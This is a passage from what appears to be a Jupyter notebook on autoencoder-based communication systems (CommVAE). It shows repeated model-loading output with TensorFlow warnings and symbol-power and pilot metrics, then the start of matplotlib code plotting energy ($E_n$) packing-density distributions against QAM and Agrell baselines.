0.81435392]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317035331.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.656661 Model: 2.656661 1.5062462032065047 1.1709658120469575 Pilots : [0.81496335 0.81496335]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317035739.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.641728 Model: 2.641728 1.5609540603688001 1.0841961066901402 Pilots : [0.81266966 0.81266966]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317040142.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.5977073 Model: 2.5977073 1.557960894347686 1.0702299617603084 Pilots : [0.80587022 0.80587022]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317040551.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6464295 Model: 2.6464295 1.509091087627232 1.1620623400267527 Pilots : [0.81339252 0.81339252]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317040958.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.665893 Model: 2.665893 1.5470613462200618 1.113852429382457 Pilots : [0.81637814 0.81637814]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317041406.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6276734 Model: 2.6276734 1.5657284632249588 1.071861049592434 Pilots : [0.81050499 0.81050499]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317041814.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6856132 Model: 2.6856132 1.5446857563624197 1.1255458001665273 Pilots : [0.81939202 0.81939202]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317042222.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.648912 Model: 2.648912 1.534327514507683 1.125204283390623 Pilots : [0.81377392 0.81377392]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317042629.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6543865 Model: 2.6543865 1.5532779160916426 1.1001852747713796 Pilots : [0.81461441 0.81461441]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317043033.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.650795 Model: 2.650795 1.5264775601475693 1.137614951256492 Pilots : [0.81406311 0.81406311]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317043447.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6193957 Model: 2.6193957 1.5494914672553075 1.0909949433367445 Pilots : [0.80922737 0.80922737]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317043849.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6506119 Model: 2.6506119 1.5500603008617393 1.1031865356186719 Pilots : [0.81403499 0.81403499]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317044304.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.649116 Model: 2.649116 1.5064305717814812 1.1673544430744351 Pilots : [0.81380527 0.81380527]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317044710.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.651208 Model: 2.651208 1.5323988506199615 1.1290161490243142 Pilots : [0.81412651 0.81412651]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317045116.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.681797 Model: 2.681797 1.5665451011806981 1.0927985231598292 Pilots : [0.81880966 0.81880966]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317045525.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.647539 Model: 2.647539 1.5655483439161761 1.0802129605462407 Pilots : [0.81356298 0.81356298]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317045935.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.639749 Model: 2.639749 1.520522594284726 1.1417654219457234 Pilots : [0.81236523 0.81236523]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317050346.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6334257 Model: 2.6334257 1.5130478031973509 1.1503123248793732 Pilots : [0.81139166 0.81139166]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317050755.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6486862 Model: 2.6486862 1.5571913456174489 1.09231158863998 Pilots : [0.81373924 0.81373924]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317051202.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6560054 Model: 2.6560054 1.5386476196944614 1.121890866023225 Pilots : [0.81486278 0.81486278]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317051610.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6593866 Model: 2.6593866 1.5390656961933864 1.1227088988350045 Pilots : [0.8153813 0.8153813]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317052019.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6559947 Model: 2.6559947 1.5624972610070067 1.0878992242307983 Pilots : [0.81486113 0.81486113]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317052434.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6306071 Model: 2.6306071 1.5326809299378399 1.1198309978372882 Pilots : [0.81095732 0.81095732]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317052840.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6805923 Model: 2.6805923 1.5301685531585392 1.1448595748250379 Pilots : [0.81862572 0.81862572]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317053253.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6515455 Model: 2.6515455 1.5555125011689679 1.095852433693469 Pilots : [0.81417835 0.81417835]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317053659.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6641314 Model: 2.6641314 1.514852663537786 1.1609535717270694 Pilots : [0.81610836 0.81610836]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317054108.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6523495 Model: 2.6523495 1.5420633019690888 1.1153889610966834 Pilots : [0.81430177 0.81430177]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317054516.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6789947 Model: 2.6789947 1.5462136268788624 1.1205541655714932 Pilots : [0.81838173 0.81838173]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317054928.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6699567 Model: 2.6699567 1.5058466694563357 1.1774506402634586 Pilots : [0.8170001 0.8170001]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317055341.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6570888 Model: 2.6570888 1.587380345143562 1.0544938823083154 Pilots : [0.81502895 0.81502895]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317055748.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6796684 Model: 2.6796684 1.5747575586883418 1.0805718659897083 Pilots : [0.81848464 0.81848464]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317060153.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6674433 Model: 2.6674433 1.5705612146443702 1.081397736476063 Pilots : [0.81661547 0.81661547]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317060600.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6834226 Model: 2.6834226 1.5338368928847874 1.1405930173209522 Pilots : [0.81905778 0.81905778]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317061011.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6208935 Model: 2.6208935 1.5184811221846108 1.1366599969683793 Pilots : [0.80945869 0.80945869]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317061417.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.669094 Model: 2.669094 1.5308647154621284 1.1389122298879955 Pilots : [0.81686812 0.81686812]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317061825.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6719437 Model: 2.6719437 1.5252444768368076 1.1485459511383758 Pilots : [0.81730405 0.81730405]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317062233.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6368499 Model: 2.6368499 1.4798619718512382 1.2040457387710786 Pilots : [0.811919 0.811919]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317062641.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6116362 Model: 2.6116362 1.5236605577585571 1.1249577778929398 Pilots : [0.80802787 0.80802787]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317063053.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6257353 Model: 2.6257353 1.5087367799698985 1.1535169607941256 Pilots : [0.81020604 0.81020604]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317063500.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6636188 Model: 2.6636188 1.5257204868751255 1.144253149129742 Pilots : [0.81602984 0.81602984]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317063909.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.657931 Model: 2.657931 1.5187059403285272 1.152381648854077 Pilots : [0.81515813 0.81515813]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317064315.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6103325 Model: 2.6103325 1.540463314272075 1.1000010721047493 Pilots : [0.80782617 0.80782617]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317064721.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.668388 Model: 2.668388 1.522434163644044 1.1512560326921077 Pilots : [0.81676005 0.81676005]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317065126.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6681242 Model: 2.6681242 1.5476584724502285 1.1139245682595516 Pilots : [0.81671969 0.81671969]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317065532.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6767244 Model: 2.6767244 1.569571291910721 1.086529619409065 Pilots : [0.81803491 0.81803491]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317065936.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6938062 Model: 2.6938062 1.5529639026929576 1.1169754334927409 Pilots : [0.82064093 0.82064093]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317070344.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.673153 Model: 2.673153 1.515292224126458 1.1642091680966846 Pilots : [0.81748898 0.81748898]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317070752.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.644737 Model: 2.644737 1.5470621204836468 1.105011980486865 Pilots : [0.81313237 0.81313237]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317071158.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6562362 Model: 2.6562362 1.52704334724338 1.139105518680364 Pilots : [0.81489818 0.81489818]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317071604.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6843255 Model: 2.6843255 1.5373298585266026 1.1357978583869197 Pilots : [0.81919556 0.81919556]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317072011.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6932008 Model: 2.6932008 1.5338741053046936 1.1446937392377694 Pilots : [0.82054872 0.82054872]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317072419.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.640733 Model: 2.640733 1.548575167476123 1.1011840486479247 Pilots : [0.81251662 0.81251662]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317072824.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6943588 Model: 2.6943588 1.5853310603166861 1.072051122858724 Pilots : [0.82072511 0.82072511]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317073229.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.7087574 Model: 2.7087574 1.5046078366066846 1.1965296693207252 Pilots : [0.82291515 0.82291515]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317073637.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.667937 Model: 2.667937 1.5192431074949584 1.1559020319536049 Pilots : [0.81669104 0.81669104]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317074044.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.652684 Model: 2.652684 1.575068510572551 1.0692681124136825 Pilots : [0.81435311 0.81435311]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317074455.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.68427 Model: 2.68427 1.5521609337855835 1.1141731420242653 Pilots : [0.81918708 0.81918708]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317074900.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.7010121 Model: 2.7010121 1.5427186335918104 1.1348882119092805 Pilots : [0.82173781 0.82173781]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317075309.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6312568 Model: 2.6312568 1.5208127187196145 1.1376581091446107 Pilots : [0.81105746 0.81105746]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317075718.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6565175 Model: 2.6565175 1.515018052457585 1.1573829135019555 Pilots : [0.81494133 0.81494133]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317080126.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.678814 Model: 2.678814 1.5428937805557597 1.1253056322217574 Pilots : [0.81835413 0.81835413]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317080534.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6800303 Model: 2.6800303 1.527714928237571 1.1482992118798288 Pilots : [0.81853991 0.81853991]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317080939.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6361227 Model: 2.6361227 1.5309994843448833 1.124645196440853 Pilots : [0.81180704 0.81180704]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317081348.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6690636 Model: 2.6690636 1.5617856381169717 1.0942487714800722 Pilots : [0.81686345 0.81686345]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317081753.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6030016 Model: 2.6030016 1.490932667750487 1.1710039845592575 Pilots : [0.80669102 0.80669102]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317082157.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6665032 Model: 2.6665032 1.5444930128480445 1.1178157174453718 Pilots : [0.81647155 0.81647155]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317082605.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.640194 Model: 2.640194 1.5486606951481365 1.1008376574251375 Pilots : [0.81243368 0.81243368]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317083010.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6731877 Model: 2.6731877 1.5115569572820948 1.1699853570050893 Pilots : [0.8174943 0.8174943]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317083426.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6159625 Model: 2.6159625 1.513075068464374 1.1426430024812735 Pilots : [0.80869687 0.80869687]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317083835.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6432285 Model: 2.6432285 1.5496291436955894 1.1007258413989698 Pilots : [0.81290044 0.81290044]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317084251.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6384783 Model: 2.6384783 1.5517368648999994 1.0957648563644093 Pilots : [0.81216967 0.81216967]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317084702.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6685238 Model: 2.6685238 1.5216460057223005 1.152507653211039 Pilots : [0.81678084 0.81678084]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317085104.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.636464 Model: 2.636464 1.5419339571274104 1.108894730346206 Pilots : [0.81185961 0.81185961]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317085511.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6485445 Model: 2.6485445 1.5415834580217114 1.1144823615144064 Pilots : [0.81371748 0.81371748]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317085916.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6519542 Model: 2.6519542 1.5648475602360856 1.0829837519665566 Pilots : [0.81424108 0.81424108]\n./models_04x02/rbf_rbf_64_32_16_n040_20190317090328.dil CommVAE\nWARNING:tensorflow:Output \"postnoise_dec_out\" missing from loss dictionary. We assume this was done on purpose. The fit and evaluate APIs will not be expecting any data to be passed to \"postnoise_dec_out\".\nsym_pow: 2.6700811 Model: 2.6700811 1.5214984204669404 1.153403984218854 Pilots : [0.81701915 0.81701915]\n" ] ], [ [ "Plot $E_n$ distribution", "_____no_output_____" ] ], [ [ "# colors = cycle(['b', 'g', 'r', 'c', 'm', 'y'])\n# plt.figure(figsize=(8,6))\n# selected_max_en = []\n# for (model_exp,density_data) in results.items():\n# d = np.array([ en for (_,en) in density_data.items() ])\n# # if np.max(d) < 1.4*qam_en: # Avoid un-necessary models\n# plt.hist(d, bins=100, cumulative=True, histtype=\"step\", label=model_exp, \n# color=next(colors), linewidth=2, linestyle=\":\" if \"Oshea\" in model_exp else \"-\")\n# selected_max_en.append(np.max(d)) if np.max(d) < 1.5*qam_en else None\n# print(model_exp, \" Min:\", np.min(d), \" Max:\", np.max(d))\n# plt.xlim([0.95*agrell_en,np.max(selected_max_en)*1.05])\n# plt.plot([qam_en,qam_en], [0,100], linewidth=6, label=\"QAM\", color=next(colors), linestyle=\":\")\n# plt.plot([agrell_en,agrell_en], [0,100], linewidth=6, label=\"Agrell\", color=next(colors), linestyle=\":\")\n# plt.grid()\n# plt.legend(loc='upper left', prop={'size':14})\n# plt.title(\"Packing Density for ({},{})\".format(blkSize,chDim), fontdict={'fontsize':18})\n# plt.xlabel(\"$E_n$\", fontdict={'fontsize':16})\n# plt.ylabel(\"Distribution\", fontdict={'fontsize':16})\n# plt.savefig(\"output.eps\", format='eps', bbox_inches='tight')\n\n# colors = cycle(['b', 'g', 'c', 'r', 'm', 'y'])\ncolors = cycle(['c', 'r', 'm', 'y', 'b', 'g'])\n# plt.figure(figsize=(8,6))\nplt.figure(figsize=(4*1.5,3*1.5))\n# plt.plot([qam_en,qam_en], [0,1], linewidth=3, label=\"QAM\", color=next(colors), linestyle=\"-.\")\n# plt.plot([agrell_en,agrell_en], [0,1], linewidth=3, label=\"[9]\", color=next(colors), linestyle=\"-.\")\nselected_max_en = []\nfor (model_exp,density_data) in results.items():\n d = 